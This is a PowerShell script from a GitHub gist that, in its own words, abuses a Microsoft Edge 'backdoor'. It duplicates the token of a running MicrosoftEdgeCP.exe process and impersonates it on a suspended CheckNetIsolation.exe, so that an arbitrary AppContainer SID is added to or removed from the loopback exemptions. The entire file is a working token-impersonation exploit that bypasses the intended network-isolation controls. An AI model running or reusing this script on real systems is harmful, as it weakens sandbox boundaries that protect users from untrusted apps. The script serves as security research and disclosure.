
@tyranid
Created July 22, 2018 11:39
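# Add an arbitrary loopback exemption by abusing the Microsoft Edge backdoor.
<#
.SYNOPSIS
Adds or deletes a loopback exemption for one SID by running
CheckNetIsolation.exe under a token copied from a Microsoft Edge content process.

.DESCRIPTION
The script opens a running MicrosoftEdgeCP.exe, duplicates its primary token as
an impersonation token, starts CheckNetIsolation.exe suspended, assigns that
token to the new process's initial thread and then lets it run.
NOTE(review): the script does not show why the Edge token is accepted for this
operation; the header comment attributes it to Edge-specific behaviour. Confirm
against the platform version in use.

To review which exemptions are currently configured on a host, run
"CheckNetIsolation.exe LoopbackExempt -s".

.PARAMETER Sid
SID string handed to CheckNetIsolation.exe as -p=<SID>. It is validated against
SID syntax because it is interpolated into a command line; without the check,
embedded whitespace would append extra arguments to the child process.

.PARAMETER Delete
Pass -d (delete the exemption) instead of -a (add it).
#>
param(
    [Parameter(Mandatory)]
    [ValidatePattern('^S-1-\d+(-\d+)+$')]
    [string]$Sid,
    [switch]$Delete
)

Import-Module NtObjectManager

# Copy the primary token of the first Edge content process found. The process
# handles are released by Use-NtObject; only the duplicated token leaves the block.
$token = Use-NtObject($ps = Get-NtProcess -Name 'MicrosoftEdgeCP.exe') {
    $p = $ps | Select-Object -First 1
    if ($null -eq $p) {
        Write-Host "Microsoft Edge must be running"
        exit
    }
    Get-NtToken -Primary -Process $p -Duplicate -ImpersonationLevel Impersonation
}

Use-NtObject($token) {
    # $action only feeds the error message so that it names the operation
    # that actually failed (the original always reported "adding").
    if ($Delete) {
        $cmd = "-d"
        $action = "deleting"
    } else {
        $cmd = "-a"
        $action = "adding"
    }

    # The child is created suspended so the impersonation token is in place on
    # its initial thread before that thread executes anything.
    Use-NtObject($proc = New-Win32Process "CheckNetIsolation.exe LoopbackExempt $cmd -p=$Sid" -CreationFlags Suspended, NewConsole) {
        $proc.Thread.SetImpersonationToken($token)
        $proc.Process.Resume()
        $proc.Process.Wait() | Out-Null
        $exitcode = $proc.Process.ExitStatus
        if ($exitcode -ne 0) {
            Write-Host "Error $action loopback exemption (exitcode: $exitcode)"
        }
    }
}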